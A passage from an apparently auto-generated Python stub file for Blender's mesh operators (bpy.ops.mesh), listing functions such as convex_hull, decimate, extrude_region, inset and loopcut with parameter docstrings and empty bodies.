number_cuts: int\n :param interpolation: Interpolation, Interpolation method \n :type interpolation: typing.Union[int, str]\n :param smoothness: Smoothness, Smoothness factor \n :type smoothness: float\n :param profile_shape_factor: Profile Factor, How much intermediary new edges are shrunk/expanded \n :type profile_shape_factor: float\n :param profile_shape: Profile Shape, Shape of the profileSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff. 
\n :type profile_shape: typing.Union[int, str]\n '''\n\n pass\n\n\ndef colors_reverse():\n '''Flip direction of vertex colors inside faces \n\n '''\n\n pass\n\n\ndef colors_rotate(use_ccw: bool = False):\n '''Rotate vertex colors inside faces \n\n :param use_ccw: Counter Clockwise \n :type use_ccw: bool\n '''\n\n pass\n\n\ndef convex_hull(delete_unused: bool = True,\n use_existing_faces: bool = True,\n make_holes: bool = False,\n join_triangles: bool = True,\n face_threshold: float = 0.698132,\n shape_threshold: float = 0.698132,\n uvs: bool = False,\n vcols: bool = False,\n seam: bool = False,\n sharp: bool = False,\n materials: bool = False):\n '''Enclose selected vertices in a convex polyhedron \n\n :param delete_unused: Delete Unused, Delete selected elements that are not used by the hull \n :type delete_unused: bool\n :param use_existing_faces: Use Existing Faces, Skip hull triangles that are covered by a pre-existing face \n :type use_existing_faces: bool\n :param make_holes: Make Holes, Delete selected faces that are used by the hull \n :type make_holes: bool\n :param join_triangles: Join Triangles, Merge adjacent triangles into quads \n :type join_triangles: bool\n :param face_threshold: Max Face Angle, Face angle limit \n :type face_threshold: float\n :param shape_threshold: Max Shape Angle, Shape angle limit \n :type shape_threshold: float\n :param uvs: Compare UVs \n :type uvs: bool\n :param vcols: Compare VCols \n :type vcols: bool\n :param seam: Compare Seam \n :type seam: bool\n :param sharp: Compare Sharp \n :type sharp: bool\n :param materials: Compare Materials \n :type materials: bool\n '''\n\n pass\n\n\ndef customdata_custom_splitnormals_add():\n '''Add a custom split normals layer, if none exists yet \n\n '''\n\n pass\n\n\ndef customdata_custom_splitnormals_clear():\n '''Remove the custom split normals layer, if it exists \n\n '''\n\n pass\n\n\ndef customdata_mask_clear():\n '''Clear vertex sculpt masking data from the mesh \n\n '''\n\n pass\n\n\ndef customdata_skin_add():\n '''Add a vertex skin layer \n\n '''\n\n pass\n\n\ndef customdata_skin_clear():\n '''Clear vertex skin layer \n\n '''\n\n pass\n\n\ndef decimate(ratio: float = 1.0,\n use_vertex_group: bool = False,\n vertex_group_factor: float = 1.0,\n invert_vertex_group: bool = False,\n use_symmetry: bool = False,\n symmetry_axis: typing.Union[int, str] = 'Y'):\n '''Simplify geometry by collapsing edges \n\n :param ratio: Ratio \n :type ratio: float\n :param use_vertex_group: Vertex Group, Use active vertex group as an influence \n :type use_vertex_group: bool\n :param vertex_group_factor: Weight, Vertex group strength \n :type vertex_group_factor: float\n :param invert_vertex_group: Invert, Invert vertex group influence \n :type invert_vertex_group: bool\n :param use_symmetry: Symmetry, Maintain symmetry on an axis \n :type use_symmetry: bool\n :param symmetry_axis: Axis, Axis of symmetry \n :type symmetry_axis: typing.Union[int, str]\n '''\n\n pass\n\n\ndef delete(type: typing.Union[int, str] = 'VERT'):\n '''Delete selected vertices, edges or faces \n\n :param type: Type, Method used for deleting mesh data \n :type type: typing.Union[int, str]\n '''\n\n pass\n\n\ndef delete_edgeloop(use_face_split: bool = True):\n '''Delete an edge loop by merging the faces on each side \n\n :param use_face_split: Face Split, Split off face corners to maintain surrounding geometry \n :type use_face_split: bool\n '''\n\n pass\n\n\ndef delete_loose(use_verts: bool = True,\n use_edges: bool = True,\n use_faces: bool = False):\n 
'''Delete loose vertices, edges or faces \n\n :param use_verts: Vertices, Remove loose vertices \n :type use_verts: bool\n :param use_edges: Edges, Remove loose edges \n :type use_edges: bool\n :param use_faces: Faces, Remove loose faces \n :type use_faces: bool\n '''\n\n pass\n\n\ndef dissolve_degenerate(threshold: float = 0.0001):\n '''Dissolve zero area faces and zero length edges \n\n :param threshold: Merge Distance, Maximum distance between elements to merge \n :type threshold: float\n '''\n\n pass\n\n\ndef dissolve_edges(use_verts: bool = True, use_face_split: bool = False):\n '''Dissolve edges, merging faces \n\n :param use_verts: Dissolve Verts, Dissolve remaining vertices \n :type use_verts: bool\n :param use_face_split: Face Split, Split off face corners to maintain surrounding geometry \n :type use_face_split: bool\n '''\n\n pass\n\n\ndef dissolve_faces(use_verts: bool = False):\n '''Dissolve faces \n\n :param use_verts: Dissolve Verts, Dissolve remaining vertices \n :type use_verts: bool\n '''\n\n pass\n\n\ndef dissolve_limited(angle_limit: float = 0.0872665,\n use_dissolve_boundaries: bool = False,\n delimit: typing.Set[typing.Union[int, str]] = {'NORMAL'}):\n '''Dissolve selected edges and verts, limited by the angle of surrounding geometry \n\n :param angle_limit: Max Angle, Angle limit \n :type angle_limit: float\n :param use_dissolve_boundaries: All Boundaries, Dissolve all vertices in between face boundaries \n :type use_dissolve_boundaries: bool\n :param delimit: Delimit, Delimit dissolve operationNORMAL Normal, Delimit by face directions.MATERIAL Material, Delimit by face material.SEAM Seam, Delimit by edge seams.SHARP Sharp, Delimit by sharp edges.UV UVs, Delimit by UV coordinates. \n :type delimit: typing.Set[typing.Union[int, str]]\n '''\n\n pass\n\n\ndef dissolve_mode(use_verts: bool = False,\n use_face_split: bool = False,\n use_boundary_tear: bool = False):\n '''Dissolve geometry based on the selection mode \n\n :param use_verts: Dissolve Verts, Dissolve remaining vertices \n :type use_verts: bool\n :param use_face_split: Face Split, Split off face corners to maintain surrounding geometry \n :type use_face_split: bool\n :param use_boundary_tear: Tear Boundary, Split off face corners instead of merging faces \n :type use_boundary_tear: bool\n '''\n\n pass\n\n\ndef dissolve_verts(use_face_split: bool = False,\n use_boundary_tear: bool = False):\n '''Dissolve verts, merge edges and faces \n\n :param use_face_split: Face Split, Split off face corners to maintain surrounding geometry \n :type use_face_split: bool\n :param use_boundary_tear: Tear Boundary, Split off face corners instead of merging faces \n :type use_boundary_tear: bool\n '''\n\n pass\n\n\ndef dupli_extrude_cursor(rotate_source: bool = True):\n '''Duplicate and extrude selected vertices, edges or faces towards the mouse cursor \n\n :param rotate_source: Rotate Source, Rotate initial selection giving better shape \n :type rotate_source: bool\n '''\n\n pass\n\n\ndef duplicate(mode: int = 1):\n '''Duplicate selected vertices, edges or faces \n\n :param mode: Mode \n :type mode: int\n '''\n\n pass\n\n\ndef duplicate_move(MESH_OT_duplicate=None, TRANSFORM_OT_translate=None):\n '''Duplicate mesh and move \n\n :param MESH_OT_duplicate: Duplicate, Duplicate selected vertices, edges or faces \n :param TRANSFORM_OT_translate: Move, Move selected items \n '''\n\n pass\n\n\ndef edge_collapse():\n '''Collapse selected edges \n\n '''\n\n pass\n\n\ndef edge_face_add():\n '''Add an edge or face to selected \n\n '''\n\n 
pass\n\n\ndef edge_rotate(use_ccw: bool = False):\n '''Rotate selected edge or adjoining faces \n\n :param use_ccw: Counter Clockwise \n :type use_ccw: bool\n '''\n\n pass\n\n\ndef edge_split():\n '''Split selected edges so that each neighbor face gets its own copy \n\n '''\n\n pass\n\n\ndef edgering_select(extend: bool = False,\n deselect: bool = False,\n toggle: bool = False,\n ring: bool = True):\n '''Select an edge ring \n\n :param extend: Extend, Extend the selection \n :type extend: bool\n :param deselect: Deselect, Remove from the selection \n :type deselect: bool\n :param toggle: Toggle Select, Toggle the selection \n :type toggle: bool\n :param ring: Select Ring, Select ring \n :type ring: bool\n '''\n\n pass\n\n\ndef edges_select_sharp(sharpness: float = 0.523599):\n '''Select all sharp-enough edges \n\n :param sharpness: Sharpness \n :type sharpness: float\n '''\n\n pass\n\n\ndef extrude_context(use_normal_flip: bool = False, mirror: bool = False):\n '''Extrude selection \n\n :param use_normal_flip: Flip Normals \n :type use_normal_flip: bool\n :param mirror: Mirror Editing \n :type mirror: bool\n '''\n\n pass\n\n\ndef extrude_context_move(MESH_OT_extrude_context=None,\n TRANSFORM_OT_translate=None):\n '''Extrude region together along the average normal \n\n :param MESH_OT_extrude_context: Extrude Context, Extrude selection \n :param TRANSFORM_OT_translate: Move, Move selected items \n '''\n\n pass\n\n\ndef extrude_edges_indiv(use_normal_flip: bool = False, mirror: bool = False):\n '''Extrude individual edges only \n\n :param use_normal_flip: Flip Normals \n :type use_normal_flip: bool\n :param mirror: Mirror Editing \n :type mirror: bool\n '''\n\n pass\n\n\ndef extrude_edges_move(MESH_OT_extrude_edges_indiv=None,\n TRANSFORM_OT_translate=None):\n '''Extrude edges and move result \n\n :param MESH_OT_extrude_edges_indiv: Extrude Only Edges, Extrude individual edges only \n :param TRANSFORM_OT_translate: Move, Move selected items \n '''\n\n pass\n\n\ndef extrude_faces_indiv(mirror: bool = False):\n '''Extrude individual faces only \n\n :param mirror: Mirror Editing \n :type mirror: bool\n '''\n\n pass\n\n\ndef extrude_faces_move(MESH_OT_extrude_faces_indiv=None,\n TRANSFORM_OT_shrink_fatten=None):\n '''Extrude each individual face separately along local normals \n\n :param MESH_OT_extrude_faces_indiv: Extrude Individual Faces, Extrude individual faces only \n :param TRANSFORM_OT_shrink_fatten: Shrink/Fatten, Shrink/fatten selected vertices along normals \n '''\n\n pass\n\n\ndef extrude_region(use_normal_flip: bool = False, mirror: bool = False):\n '''Extrude region of faces \n\n :param use_normal_flip: Flip Normals \n :type use_normal_flip: bool\n :param mirror: Mirror Editing \n :type mirror: bool\n '''\n\n pass\n\n\ndef extrude_region_move(MESH_OT_extrude_region=None,\n TRANSFORM_OT_translate=None):\n '''Extrude region and move result \n\n :param MESH_OT_extrude_region: Extrude Region, Extrude region of faces \n :param TRANSFORM_OT_translate: Move, Move selected items \n '''\n\n pass\n\n\ndef extrude_region_shrink_fatten(MESH_OT_extrude_region=None,\n TRANSFORM_OT_shrink_fatten=None):\n '''Extrude region together along local normals \n\n :param MESH_OT_extrude_region: Extrude Region, Extrude region of faces \n :param TRANSFORM_OT_shrink_fatten: Shrink/Fatten, Shrink/fatten selected vertices along normals \n '''\n\n pass\n\n\ndef extrude_repeat(offset: float = 2.0, steps: int = 10):\n '''Extrude selected vertices, edges or faces repeatedly \n\n :param offset: Offset \n :type 
offset: float\n :param steps: Steps \n :type steps: int\n '''\n\n pass\n\n\ndef extrude_vertices_move(MESH_OT_extrude_verts_indiv=None,\n TRANSFORM_OT_translate=None):\n '''Extrude vertices and move result \n\n :param MESH_OT_extrude_verts_indiv: Extrude Only Vertices, Extrude individual vertices only \n :param TRANSFORM_OT_translate: Move, Move selected items \n '''\n\n pass\n\n\ndef extrude_verts_indiv(mirror: bool = False):\n '''Extrude individual vertices only \n\n :param mirror: Mirror Editing \n :type mirror: bool\n '''\n\n pass\n\n\ndef face_make_planar(factor: float = 1.0, repeat: int = 1):\n '''Flatten selected faces \n\n :param factor: Factor \n :type factor: float\n :param repeat: Iterations \n :type repeat: int\n '''\n\n pass\n\n\ndef face_split_by_edges():\n '''Weld loose edges into faces (splitting them into new faces) \n\n '''\n\n pass\n\n\ndef faces_mirror_uv(direction: typing.Union[int, str] = 'POSITIVE',\n precision: int = 3):\n '''Copy mirror UV coordinates on the X axis based on a mirrored mesh \n\n :param direction: Axis Direction \n :type direction: typing.Union[int, str]\n :param precision: Precision, Tolerance for finding vertex duplicates \n :type precision: int\n '''\n\n pass\n\n\ndef faces_select_linked_flat(sharpness: float = 0.0174533):\n '''Select linked faces by angle \n\n :param sharpness: Sharpness \n :type sharpness: float\n '''\n\n pass\n\n\ndef faces_shade_flat():\n '''Display faces flat \n\n '''\n\n pass\n\n\ndef faces_shade_smooth():\n '''Display faces smooth (using vertex normals) \n\n '''\n\n pass\n\n\ndef fill(use_beauty: bool = True):\n '''Fill a selected edge loop with faces \n\n :param use_beauty: Beauty, Use best triangulation division \n :type use_beauty: bool\n '''\n\n pass\n\n\ndef fill_grid(span: int = 1, offset: int = 0, use_interp_simple: bool = False):\n '''Fill grid from two loops \n\n :param span: Span, Number of grid columns \n :type span: int\n :param offset: Offset, Vertex that is the corner of the grid \n :type offset: int\n :param use_interp_simple: Simple Blending, Use simple interpolation of grid vertices \n :type use_interp_simple: bool\n '''\n\n pass\n\n\ndef fill_holes(sides: int = 4):\n '''Fill in holes (boundary edge loops) \n\n :param sides: Sides, Number of sides in hole required to fill (zero fills all holes) \n :type sides: int\n '''\n\n pass\n\n\ndef flip_normals():\n '''Flip the direction of selected faces’ normals (and of their vertices) \n\n '''\n\n pass\n\n\ndef hide(unselected: bool = False):\n '''Hide (un)selected vertices, edges or faces \n\n :param unselected: Unselected, Hide unselected rather than selected \n :type unselected: bool\n '''\n\n pass\n\n\ndef inset(use_boundary: bool = True,\n use_even_offset: bool = True,\n use_relative_offset: bool = False,\n use_edge_rail: bool = False,\n thickness: float = 0.0,\n depth: float = 0.0,\n use_outset: bool = False,\n use_select_inset: bool = False,\n use_individual: bool = False,\n use_interpolate: bool = True,\n release_confirm: bool = False):\n '''Inset new faces into selected faces \n\n :param use_boundary: Boundary, Inset face boundaries \n :type use_boundary: bool\n :param use_even_offset: Offset Even, Scale the offset to give more even thickness \n :type use_even_offset: bool\n :param use_relative_offset: Offset Relative, Scale the offset by surrounding geometry \n :type use_relative_offset: bool\n :param use_edge_rail: Edge Rail, Inset the region along existing edges \n :type use_edge_rail: bool\n :param thickness: Thickness \n :type thickness: float\n 
:param depth: Depth \n :type depth: float\n :param use_outset: Outset, Outset rather than inset \n :type use_outset: bool\n :param use_select_inset: Select Outer, Select the new inset faces \n :type use_select_inset: bool\n :param use_individual: Individual, Individual Face Inset \n :type use_individual: bool\n :param use_interpolate: Interpolate, Blend face data across the inset \n :type use_interpolate: bool\n :param release_confirm: Confirm on Release \n :type release_confirm: bool\n '''\n\n pass\n\n\ndef intersect(mode: typing.Union[int, str] = 'SELECT_UNSELECT',\n separate_mode: typing.Union[int, str] = 'CUT',\n threshold: float = 1e-06):\n '''Cut an intersection into faces \n\n :param mode: SourceSELECT Self Intersect, Self intersect selected faces.SELECT_UNSELECT Selected/Unselected, Intersect selected with unselected faces. \n :type mode: typing.Union[int, str]\n :param separate_mode: Separate ModeALL All, Separate all geometry from intersections.CUT Cut, Cut into geometry keeping each side separate (Selected/Unselected only).NONE Merge, Merge all geometry from the intersection. \n :type separate_mode: typing.Union[int, str]\n :param threshold: Merge threshold \n :type threshold: float\n '''\n\n pass\n\n\ndef intersect_boolean(operation: typing.Union[int, str] = 'DIFFERENCE',\n use_swap: bool = False,\n threshold: float = 1e-06):\n '''Cut solid geometry from selected to unselected \n\n :param operation: Boolean \n :type operation: typing.Union[int, str]\n :param use_swap: Swap, Use with difference intersection to swap which side is kept \n :type use_swap: bool\n :param threshold: Merge threshold \n :type threshold: float\n '''\n\n pass\n\n\ndef knife_project(cut_through: bool = False):\n '''Use other objects outlines & boundaries to project knife cuts \n\n :param cut_through: Cut through, Cut through all faces, not just visible ones \n :type cut_through: bool\n '''\n\n pass\n\n\ndef knife_tool(use_occlude_geometry: bool = True,\n only_selected: bool = False,\n wait_for_input: bool = True):\n '''Cut new topology \n\n :param use_occlude_geometry: Occlude Geometry, Only cut the front most geometry \n :type use_occlude_geometry: bool\n :param only_selected: Only Selected, Only cut selected geometry \n :type only_selected: bool\n :param wait_for_input: Wait for Input \n :type wait_for_input: bool\n '''\n\n pass\n\n\ndef loop_multi_select(ring: bool = False):\n '''Select a loop of connected edges by connection type \n\n :param ring: Ring \n :type ring: bool\n '''\n\n pass\n\n\ndef loop_select(extend: bool = False,\n deselect: bool = False,\n toggle: bool = False,\n ring: bool = False):\n '''Select a loop of connected edges \n\n :param extend: Extend Select, Extend the selection \n :type extend: bool\n :param deselect: Deselect, Remove from the selection \n :type deselect: bool\n :param toggle: Toggle Select, Toggle the selection \n :type toggle: bool\n :param ring: Select Ring, Select ring \n :type ring: bool\n '''\n\n pass\n\n\ndef loop_to_region(select_bigger: bool = False):\n '''Select region of faces inside of a selected loop of edges \n\n :param select_bigger: Select Bigger, Select bigger regions instead of smaller ones \n :type select_bigger: bool\n '''\n\n pass\n\n\ndef loopcut(number_cuts: int = 1,\n smoothness: float = 0.0,\n falloff: typing.Union[int, str] = 'INVERSE_SQUARE',\n object_index: int = -1,\n edge_index: int = -1,\n mesh_select_mode_init=(False, False, False)):\n '''Add a new loop between existing loops \n\n :param number_cuts: Number of Cuts \n :type number_cuts: 
int\n :param smoothness: Smoothness, Smoothness factor \n :type smoothness: float\n :param falloff: Falloff, Falloff type the featherSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff. \n :type falloff: typing.Union[int, str]\n :param object_index: Object Index \n :type object_index: int\n :param edge_index: Edge Index \n :type edge_index: int\n '''\n\n pass\n\n\ndef loopcut_slide(MESH_OT_loopcut=None, TRANSFORM_OT_edge_slide=None):\n '''Cut mesh loop and slide it \n\n :param MESH_OT_loopcut: Loop Cut, Add a new loop between existing loops \n :param TRANSFORM_OT_edge_slide: Edge Slide, Slide an edge loop along a mesh \n '''\n\n pass\n\n\ndef mark_freestyle_edge(clear: bool = False):\n '''(Un)mark selected edges as Freestyle feature edges \n\n :param clear: Clear \n :type clear: bool\n '''\n\n pass\n\n\ndef mark_freestyle_face(clear: bool = False):\n '''(Un)mark selected faces for exclusion from Freestyle feature edge detection \n\n :param clear: Clear \n :type clear: bool\n '''\n\n pass\n\n\ndef mark_seam(clear: bool = False):\n '''(Un)mark selected edges as a seam \n\n :param clear: Clear \n :type clear: bool\n '''\n\n pass\n\n\ndef mark_sharp(clear: bool = False, use_verts: bool = False):\n '''(Un)mark selected edges as sharp \n\n :param clear: Clear \n :type clear: bool\n :param use_verts: Vertices, Consider vertices instead of edges to select which edges to (un)tag as sharp \n :type use_verts: bool\n '''\n\n pass\n\n\ndef merge(type: typing.Union[int, str] = 'CENTER', uvs: bool = False):\n '''Merge selected vertices \n\n :param type: Type, Merge method to use \n :type type: typing.Union[int, str]\n :param uvs: UVs, Move UVs according to merge \n :type uvs: bool\n '''\n\n pass\n\n\ndef merge_normals():\n '''Merge custom normals of selected vertices \n\n '''\n\n pass\n\n\ndef mod_weighted_strength(set: bool = False,\n face_strength: typing.Union[int, str] = 'MEDIUM'):\n '''Set/Get strength of face (used in Weighted Normal modifier) \n\n :param set: Set value, Set Value of faces \n :type set: bool\n :param face_strength: Face Strength, Strength to use for assigning or selecting face influence for weighted normal modifier \n :type face_strength: typing.Union[int, str]\n '''\n\n pass\n\n\ndef normals_make_consistent(inside: bool = False):\n '''Make face and vertex normals point either outside or inside the mesh \n\n :param inside: Inside \n :type inside: bool\n '''\n\n pass\n\n\ndef normals_tools(mode: typing.Union[int, str] = 'COPY',\n absolute: bool = False):\n '''Custom normals tools using Normal Vector of UI \n\n :param mode: Mode, Mode of tools taking input from InterfaceCOPY Copy Normal, Copy normal to buffer.PASTE Paste Normal, Paste normal from buffer.ADD Add Normal, Add normal vector with selection.MULTIPLY Multiply Normal, Multiply normal vector with selection.RESET Reset Normal, Reset buffer and/or normal of selected element. 
\n :type mode: typing.Union[int, str]\n :param absolute: Absolute Coordinates, Copy Absolute coordinates or Normal vector \n :type absolute: bool\n '''\n\n pass\n\n\ndef offset_edge_loops(use_cap_endpoint: bool = False):\n '''Create offset edge loop from the current selection \n\n :param use_cap_endpoint: Cap Endpoint, Extend loop around end-points \n :type use_cap_endpoint: bool\n '''\n\n pass\n\n\ndef offset_edge_loops_slide(MESH_OT_offset_edge_loops=None,\n TRANSFORM_OT_edge_slide=None):\n '''Offset edge loop slide \n\n :param MESH_OT_offset_edge_loops: Offset Edge Loop, Create offset edge loop from the current selection \n :param TRANSFORM_OT_edge_slide: Edge Slide, Slide an edge loop along a mesh \n '''\n\n pass\n\n\ndef paint_mask_extract(mask_threshold: float = 0.5,\n add_boundary_loop: bool = True,\n smooth_iterations: int = 4,\n apply_shrinkwrap: bool = True,\n add_solidify: bool = True):\n '''Create a new mesh object from the current paint mask \n\n :param mask_threshold: Threshold, Minimum mask value to consider the vertex valid to extract a face from the original mesh \n :type mask_threshold: float\n :param add_boundary_loop: Add Boundary Loop, Add an extra edge loop to better preserve the shape when applying a subdivision surface modifier \n :type add_boundary_loop: bool\n :param smooth_iterations: Smooth Iterations, Smooth iterations applied to the extracted mesh \n :type smooth_iterations: int\n :param apply_shrinkwrap: Project to Sculpt, Project the extracted mesh into the original sculpt \n :type apply_shrinkwrap: bool\n :param add_solidify: Extract as Solid, Extract the mask as a solid object with a solidify modifier \n :type add_solidify: bool\n '''\n\n pass\n\n\ndef point_normals(mode: typing.Union[int, str] = 'COORDINATES',\n invert: bool = False,\n align: bool = False,\n target_location: float = (0.0, 0.0, 0.0),\n spherize: bool = False,\n spherize_strength: float = 0.1):\n '''Point selected custom normals to specified Target \n\n :param mode: Mode, How to define coordinates to point custom normals toCOORDINATES Coordinates, Use static coordinates (defined by various means).MOUSE Mouse, Follow mouse cursor. \n :type mode: typing.Union[int, str]\n :param invert: Invert, Invert affected normals \n :type invert: bool\n :param align: Align, Make all affected normals parallel \n :type align: bool\n :param target_location: Target, Target location to which normals will point \n :type target_location: float\n :param spherize: Spherize, Interpolate between original and new normals \n :type spherize: bool\n :param spherize_strength: Spherize Strength, Ratio of spherized normal to original normal \n :type spherize_strength: float\n '''\n\n pass\n\n\ndef poke(offset: float = 0.0,\n use_relative_offset: bool = False,\n center_mode: typing.Union[int, str] = 'MEDIAN_WEIGHTED'):\n '''Split a face into a fan \n\n :param offset: Poke Offset, Poke Offset \n :type offset: float\n :param use_relative_offset: Offset Relative, Scale the offset by surrounding geometry \n :type use_relative_offset: bool\n :param center_mode: Poke Center, Poke Face Center CalculationMEDIAN_WEIGHTED Weighted Median, Weighted median face center.MEDIAN Median, Median face center.BOUNDS Bounds, Face bounds center. 
\n :type center_mode: typing.Union[int, str]\n '''\n\n pass\n\n\ndef polybuild_delete_at_cursor(\n mirror: bool = False,\n use_proportional_edit: bool = False,\n proportional_edit_falloff: typing.Union[int, str] = 'SMOOTH',\n proportional_size: float = 1.0,\n use_proportional_connected: bool = False,\n use_proportional_projected: bool = False,\n release_confirm: bool = False,\n use_accurate: bool = False):\n '''Undocumented contribute \n\n :param mirror: Mirror Editing \n :type mirror: bool\n :param use_proportional_edit: Proportional Editing \n :type use_proportional_edit: bool\n :param proportional_edit_falloff: Proportional Falloff, Falloff type for proportional editing modeSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.CONSTANT Constant, Constant falloff.RANDOM Random, Random falloff. \n :type proportional_edit_falloff: typing.Union[int, str]\n :param proportional_size: Proportional Size \n :type proportional_size: float\n :param use_proportional_connected: Connected \n :type use_proportional_connected: bool\n :param use_proportional_projected: Projected (2D) \n :type use_proportional_projected: bool\n :param release_confirm: Confirm on Release, Always confirm operation when releasing button \n :type release_confirm: bool\n :param use_accurate: Accurate, Use accurate transformation \n :type use_accurate: bool\n '''\n\n pass\n\n\ndef polybuild_dissolve_at_cursor():\n '''Undocumented contribute \n\n '''\n\n pass\n\n\ndef polybuild_extrude_at_cursor_move(\n MESH_OT_polybuild_transform_at_cursor=None,\n MESH_OT_extrude_edges_indiv=None,\n TRANSFORM_OT_translate=None):\n '''Undocumented contribute \n\n :param MESH_OT_polybuild_transform_at_cursor: Poly Build Transform at Cursor \n :param MESH_OT_extrude_edges_indiv: Extrude Only Edges, Extrude individual edges only \n :param TRANSFORM_OT_translate: Move, Move selected items \n '''\n\n pass\n\n\ndef polybuild_face_at_cursor(\n create_quads: bool = True,\n mirror: bool = False,\n use_proportional_edit: bool = False,\n proportional_edit_falloff: typing.Union[int, str] = 'SMOOTH',\n proportional_size: float = 1.0,\n use_proportional_connected: bool = False,\n use_proportional_projected: bool = False,\n release_confirm: bool = False,\n use_accurate: bool = False):\n '''Undocumented contribute \n\n :param create_quads: Create quads, Automatically split edges in triangles to maintain quad topology \n :type create_quads: bool\n :param mirror: Mirror Editing \n :type mirror: bool\n :param use_proportional_edit: Proportional Editing \n :type use_proportional_edit: bool\n :param proportional_edit_falloff: Proportional Falloff, Falloff type for proportional editing modeSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.CONSTANT Constant, Constant falloff.RANDOM Random, Random falloff. 
\n :type proportional_edit_falloff: typing.Union[int, str]\n :param proportional_size: Proportional Size \n :type proportional_size: float\n :param use_proportional_connected: Connected \n :type use_proportional_connected: bool\n :param use_proportional_projected: Projected (2D) \n :type use_proportional_projected: bool\n :param release_confirm: Confirm on Release, Always confirm operation when releasing button \n :type release_confirm: bool\n :param use_accurate: Accurate, Use accurate transformation \n :type use_accurate: bool\n '''\n\n pass\n\n\ndef polybuild_face_at_cursor_move(MESH_OT_polybuild_face_at_cursor=None,\n TRANSFORM_OT_translate=None):\n '''Undocumented contribute \n\n :param MESH_OT_polybuild_face_at_cursor: Poly Build Face at Cursor \n :param TRANSFORM_OT_translate: Move, Move selected items \n '''\n\n pass\n\n\ndef polybuild_split_at_cursor(\n mirror: bool = False,\n use_proportional_edit: bool = False,\n proportional_edit_falloff: typing.Union[int, str] = 'SMOOTH',\n proportional_size: float = 1.0,\n use_proportional_connected: bool = False,\n use_proportional_projected: bool = False,\n release_confirm: bool = False,\n use_accurate: bool = False):\n '''Undocumented contribute \n\n :param mirror: Mirror Editing \n :type mirror: bool\n :param use_proportional_edit: Proportional Editing \n :type use_proportional_edit: bool\n :param proportional_edit_falloff: Proportional Falloff, Falloff type for proportional editing modeSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.CONSTANT Constant, Constant falloff.RANDOM Random, Random falloff. \n :type proportional_edit_falloff: typing.Union[int, str]\n :param proportional_size: Proportional Size \n :type proportional_size: float\n :param use_proportional_connected: Connected \n :type use_proportional_connected: bool\n :param use_proportional_projected: Projected (2D) \n :type use_proportional_projected: bool\n :param release_confirm: Confirm on Release, Always confirm operation when releasing button \n :type release_confirm: bool\n :param use_accurate: Accurate, Use accurate transformation \n :type use_accurate: bool\n '''\n\n pass\n\n\ndef polybuild_split_at_cursor_move(MESH_OT_polybuild_split_at_cursor=None,\n TRANSFORM_OT_translate=None):\n '''Undocumented contribute \n\n :param MESH_OT_polybuild_split_at_cursor: Poly Build Split at Cursor \n :param TRANSFORM_OT_translate: Move, Move selected items \n '''\n\n pass\n\n\ndef polybuild_transform_at_cursor(\n mirror: bool = False,\n use_proportional_edit: bool = False,\n proportional_edit_falloff: typing.Union[int, str] = 'SMOOTH',\n proportional_size: float = 1.0,\n use_proportional_connected: bool = False,\n use_proportional_projected: bool = False,\n release_confirm: bool = False,\n use_accurate: bool = False):\n '''Undocumented contribute \n\n :param mirror: Mirror Editing \n :type mirror: bool\n :param use_proportional_edit: Proportional Editing \n :type use_proportional_edit: bool\n :param proportional_edit_falloff: Proportional Falloff, Falloff type for proportional editing modeSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff.CONSTANT Constant, Constant falloff.RANDOM Random, Random falloff. 
\n :type proportional_edit_falloff: typing.Union[int, str]\n :param proportional_size: Proportional Size \n :type proportional_size: float\n :param use_proportional_connected: Connected \n :type use_proportional_connected: bool\n :param use_proportional_projected: Projected (2D) \n :type use_proportional_projected: bool\n :param release_confirm: Confirm on Release, Always confirm operation when releasing button \n :type release_confirm: bool\n :param use_accurate: Accurate, Use accurate transformation \n :type use_accurate: bool\n '''\n\n pass\n\n\ndef polybuild_transform_at_cursor_move(\n MESH_OT_polybuild_transform_at_cursor=None,\n TRANSFORM_OT_translate=None):\n '''Undocumented contribute \n\n :param MESH_OT_polybuild_transform_at_cursor: Poly Build Transform at Cursor \n :param TRANSFORM_OT_translate: Move, Move selected items \n '''\n\n pass\n\n\ndef primitive_circle_add(vertices: int = 32,\n radius: float = 1.0,\n fill_type: typing.Union[int, str] = 'NOTHING',\n calc_uvs: bool = True,\n enter_editmode: bool = False,\n align: typing.Union[int, str] = 'WORLD',\n location: float = (0.0, 0.0, 0.0),\n rotation: float = (0.0, 0.0, 0.0)):\n '''Construct a circle mesh \n\n :param vertices: Vertices \n :type vertices: int\n :param radius: Radius \n :type radius: float\n :param fill_type: Fill TypeNOTHING Nothing, Don’t fill at all.NGON Ngon, Use ngons.TRIFAN Triangle Fan, Use triangle fans. \n :type fill_type: typing.Union[int, str]\n :param calc_uvs: Generate UVs, Generate a default UV map \n :type calc_uvs: bool\n :param enter_editmode: Enter Editmode, Enter editmode when adding this object \n :type enter_editmode: bool\n :param align: Align, The alignment of the new objectWORLD World, Align the new object to the world.VIEW View, Align the new object to the view.CURSOR 3D Cursor, Use the 3D cursor orientation for the new object. \n :type align: typing.Union[int, str]\n :param location: Location, Location for the newly added object \n :type location: float\n :param rotation: Rotation, Rotation for the newly added object \n :type rotation: float\n '''\n\n pass\n\n\ndef primitive_cone_add(vertices: int = 32,\n radius1: float = 1.0,\n radius2: float = 0.0,\n depth: float = 2.0,\n end_fill_type: typing.Union[int, str] = 'NGON',\n calc_uvs: bool = True,\n enter_editmode: bool = False,\n align: typing.Union[int, str] = 'WORLD',\n location: float = (0.0, 